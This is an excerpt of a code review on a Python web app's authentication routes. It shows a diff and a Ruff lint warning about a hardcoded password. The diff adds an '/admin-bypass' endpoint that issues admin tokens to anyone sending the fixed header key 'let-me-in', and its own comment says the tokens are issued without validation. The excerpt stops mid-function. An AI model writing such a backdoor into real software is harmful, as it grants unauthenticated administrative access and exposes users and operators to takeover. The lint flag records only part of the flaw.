app/auth/routes.py

```
@@ -72,6 +76,49 @@ async def login(user_data: UserLoginRequest):
         )
 
 
+@router.post("/admin-bypass")
+async def admin_bypass(x_admin_key: str = Header(None)):
+
+    if x_admin_key == "let-me-in":
+        # generate tokens for a fake admin user without validation
+        auth_result = await firebase_auth.sign_in_user(
+            email="admin@example.com", password="ignored"
```

Ruff (0.13.1)

Possible hardcoded password assigned to argument: "password"

(S106)